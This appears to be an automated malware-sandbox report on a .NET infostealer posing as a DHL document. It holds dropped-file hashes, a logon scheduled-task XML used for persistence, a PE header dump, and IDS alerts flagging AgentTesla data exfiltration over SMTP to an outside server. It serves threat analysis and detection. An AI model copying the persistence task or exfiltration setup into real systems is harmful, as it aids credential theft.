                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.038920595031593
                                              Encrypted:false
                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                              Malicious:false
                                              Preview:# PowerShell test file to determine AppLocker lockdown mode
(Seven further files dropped by C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe are byte-identical to the entry above: the same 60-byte "PowerShell test file to determine AppLocker lockdown mode" text, the same MD5/SHA1/SHA-256/SHA-512 values, Malicious: false. They are written by PowerShell itself at start-up, not by the sample's code.)
                                              Process:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1567
                                              Entropy (8bit):5.1066684367748785
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTFv:He7XQBBYrFdOFzOz6dKrsuJ
                                              MD5:C7A02A5B6394BF9114E1F12B2EB0BCAB
                                              SHA1:4841A38955D5AFA0FC893812089BB67A59063651
                                              SHA-256:3A457441E5445C4B4FE52FCA6A5B62C4C36BE9E3713389860D707BD32283FBEF
                                              SHA-512:471494AC9A59CFEB93393661DEEC03705E3754730E123E140F8991526CB6B0AEC90F39E62B3C633775F8BC3DF7465728DDA1A7BA43D6AC7491437F5492C7D04A
                                              Malicious:true
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                              Process:C:\Users\user\AppData\Roaming\uvbIwIYe.exe
                                              File Type:XML 1.0 document, ASCII text
                                              Category:dropped
                                              Size (bytes):1567
                                              Entropy (8bit):5.1066684367748785
                                              Encrypted:false
                                              SSDEEP:48:cge7XQBBYrFdOFzOzN33ODOiDdKrsuTFv:He7XQBBYrFdOFzOz6dKrsuJ
                                              MD5:C7A02A5B6394BF9114E1F12B2EB0BCAB
                                              SHA1:4841A38955D5AFA0FC893812089BB67A59063651
                                              SHA-256:3A457441E5445C4B4FE52FCA6A5B62C4C36BE9E3713389860D707BD32283FBEF
                                              SHA-512:471494AC9A59CFEB93393661DEEC03705E3754730E123E140F8991526CB6B0AEC90F39E62B3C633775F8BC3DF7465728DDA1A7BA43D6AC7491437F5492C7D04A
                                              Malicious:false
                                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvailable>f
                                              Process:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):835080
                                              Entropy (8bit):7.689635791311562
                                              Encrypted:false
                                              SSDEEP:24576:XjlIhSPd+pl8v00qWGThl9oeg9adzlqmNd8kX:Xjl+SPspl8cVWGThl9MMdzl/Np
                                              MD5:5D1D0F26EBB26738D78E964C0A57DE2D
                                              SHA1:392ED434F12587A91368FB253F75FD6DFFBF25EA
SHA-256:C01469EC1500B5BBB7ACE40F1823B41E0965607D4FA54497F3DFF82712C8070A (identical to the submitted sample DHL_231437894819.bat.exe, so this dropped PE is a byte-for-byte self-copy, not a second-stage payload)
                                              SHA-512:E3400EF8655C994754FD4E75C5A3EBBB91A4C53638D079E1616D80DF0661EC3FB357CBDCCDC51D5BDD1A9B4B8AE5466DF6D7D70A3DC75831D353324A0BFE03EA
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 71%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4`g..............0..`...&......*~... ........@.. ....................................@..................................}..O.......("...............6........................................................... ............... ..H............text...0^... ...`.................. ..`.rsrc...(".......$...b..............@..@.reloc..............................@..B.................~......H.......d1...!...........S...*...........................................0...........(........}.....s....}.....r...p(....}.....~.... ....s....}.....{....o.... ......o......{.....o......{....o.....{....o......{.....{....o.....*f........s ...s!...("....*~..{....r...po......{....o#....*.0..}.........{....r9..po......+7...{.....|....o$...}....(%....{....o&.....{.....o........+.&..{....rS..po........&..{....rS..po........*...........>P..........>f.........}.....('.......s....}....
                                              Process:C:\Users\user\Desktop\DHL_231437894819.bat.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:true
                                              Preview:[ZoneTransfer]....ZoneId=0
                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.689635791311562
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                              • Win32 Executable (generic) a (10002005/4) 49.97%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              • DOS Executable Generic (2002/1) 0.01%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:DHL_231437894819.bat.exe
                                              File size:835'080 bytes
                                              MD5:5d1d0f26ebb26738d78e964c0a57de2d
                                              SHA1:392ed434f12587a91368fb253f75fd6dffbf25ea
                                              SHA256:c01469ec1500b5bbb7ace40f1823b41e0965607d4fa54497f3dff82712c8070a
                                              SHA512:e3400ef8655c994754fd4e75c5a3ebbb91a4c53638d079e1616d80df0661ec3fb357cbdccdc51d5bdd1a9b4b8ae5466df6d7d70a3dc75831d353324a0bfe03ea
                                              SSDEEP:24576:XjlIhSPd+pl8v00qWGThl9oeg9adzlqmNd8kX:Xjl+SPspl8cVWGThl9MMdzl/Np
                                              TLSH:E105D0C03F2A7701DE6CB934852ADDB862642E74B004B9E37EED2B57B6D91126E1CF50
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4`g..............0..`...&......*~... ........@.. ....................................@................................
                                              Icon Hash:37c38329a3924d33
                                              Entrypoint:0x4c7e2a
                                              Entrypoint Section:.text
                                              Digitally signed:true
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x676034AF [Mon Dec 16 14:09:51 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                              Signature Valid:false
                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                              Signature Validation Error:The digital signature of the object did not verify
                                              Error Number:-2146869232
                                              Not Before:12/11/2018 19:00:00
                                              Not After:08/11/2021 18:59:59
                                              Subject Chain
                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                              Version:3
                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                              Serial:7C1118CBBADC95DA3752C46E47A27438
                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              Name | Virtual Address | Virtual Size | Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc7dd8 | 0x4f | .text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x2228 | .rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_SECURITY | 0xc8800 | 0x3608 |
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xcc000 | 0xc | .reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                              Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                              .text | 0x2000 | 0xc5e30 | 0xc6000 | 0e36ea1a438774298df790c3f9111043 | False | 0.8843944819286617 | data | 7.686508878932828 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc | 0xc8000 | 0x2228 | 0x2400 | 99af528dc07f9a68d93b58dec4ca1d89 | False | 0.8845486111111112 | data | 7.3843062470544885 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .reloc | 0xcc000 | 0xc | 0x200 | 7f75d45b9e0380e3a5f2ff1f87d4c478 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                              Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                              RT_ICON | 0xc80c8 | 0x1e1f | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9939048113085203
                                              RT_GROUP_ICON | 0xc9ef8 | 0x14 | data | | | 1.05
                                              RT_VERSION | 0xc9f1c | 0x308 | data | | | 0.45618556701030927
                                              DLL | Import
                                              mscoree.dll | _CorExeMain
                                              Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                              2024-12-19T10:28:23.030175+0100 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.10 | 49718 | 162.241.224.14 | 587 | TCP
                                              2024-12-19T10:28:23.030175+0100 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.10 | 49718 | 162.241.224.14 | 587 | TCP
                                              2024-12-19T10:28:51.558509+0100 | 2855245 | ETPRO MALWARE Agent Tesla Exfil via SMTP | 1 | 192.168.2.10 | 49718 | 162.241.224.14 | 587 | TCP
                                              2024-12-19T10:28:51.558509+0100 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.10 | 49718 | 162.241.224.14 | 587 | TCP
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Dec 19, 2024 10:28:36.208709002 CET | 49711 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:36.208739042 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:36.208826065 CET | 49711 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:36.229546070 CET | 49711 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:36.229567051 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:37.446626902 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:37.446935892 CET | 49711 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:37.450151920 CET | 49711 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:37.450165987 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:37.450437069 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:37.576486111 CET | 49711 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:37.619337082 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:37.900506973 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:37.900600910 CET | 443 | 49711 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:37.900763988 CET | 49711 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:37.907370090 CET | 49711 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:38.053426981 CET | 49712 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:38.173093081 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:38.173187017 CET | 49712 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:38.173309088 CET | 49712 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:38.292817116 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:39.324820995 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:39.503258944 CET | 49712 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:39.923830986 CET | 49712 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:40.043590069 CET | 80 | 49712 | 208.95.112.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:40.043684006 CET | 49712 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:40.331638098 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:40.451740026 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:40.452176094 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:41.626859903 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:41.627088070 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:41.746820927 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:41.992829084 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:41.993706942 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:42.115063906 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:42.362397909 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:42.362752914 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:42.482423067 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:42.846374035 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:42.846599102 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:42.966188908 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:43.212127924 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:43.218147993 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:43.337618113 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:43.591236115 CET | 587 | 49713 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:43.643934011 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:44.385881901 CET | 49714 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:44.385910034 CET | 443 | 49714 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:44.386012077 CET | 49714 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:44.390489101 CET | 49714 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:44.390501976 CET | 443 | 49714 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:44.699876070 CET | 49713 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:45.602555037 CET | 443 | 49714 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:45.602962971 CET | 49714 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:45.604352951 CET | 49714 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:45.604362011 CET | 443 | 49714 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:45.604608059 CET | 443 | 49714 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:45.659568071 CET | 49714 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:45.666615963 CET | 49714 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:45.707365990 CET | 443 | 49714 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:46.044363976 CET | 443 | 49714 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:46.044426918 CET | 443 | 49714 | 104.26.13.205 | 192.168.2.10
                                              Dec 19, 2024 10:28:46.044480085 CET | 49714 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:46.048868895 CET | 49714 | 443 | 192.168.2.10 | 104.26.13.205
                                              Dec 19, 2024 10:28:46.055499077 CET | 49716 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:46.175091982 CET | 80 | 49716 | 208.95.112.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:46.175201893 CET | 49716 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:46.175503969 CET | 49716 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:46.295875072 CET | 80 | 49716 | 208.95.112.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:47.324632883 CET | 80 | 49716 | 208.95.112.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:47.378366947 CET | 49716 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:47.891189098 CET | 49716 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:47.891666889 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:48.011226892 CET | 80 | 49716 | 208.95.112.1 | 192.168.2.10
                                              Dec 19, 2024 10:28:48.011284113 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:48.011413097 CET | 49716 | 80 | 192.168.2.10 | 208.95.112.1
                                              Dec 19, 2024 10:28:48.011440992 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:49.322812080 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:49.323024988 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:49.442462921 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:49.694004059 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:49.694305897 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:49.814169884 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:50.062462091 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:50.062719107 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:50.182267904 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:50.438704014 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:50.438916922 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:50.558516026 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:50.804887056 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:50.805187941 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:50.924838066 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:51.177762032 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:51.191715002 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:51.311264038 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:51.557792902 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:51.558374882 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:51.558509111 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:51.558553934 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:51.558602095 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:28:51.677970886 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:51.678014040 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:51.678174973 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:51.678227901 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:52.020623922 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:28:52.065849066 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:30:27.910811901 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:30:28.030400038 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:30:28.488471031 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:30:28.488715887 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Dec 19, 2024 10:30:28.488785028 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:30:28.488888025 CET | 49718 | 587 | 192.168.2.10 | 162.241.224.14
                                              Dec 19, 2024 10:30:28.610132933 CET | 587 | 49718 | 162.241.224.14 | 192.168.2.10
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Dec 19, 2024 10:28:36.059040070 CET | 65479 | 53 | 192.168.2.10 | 1.1.1.1
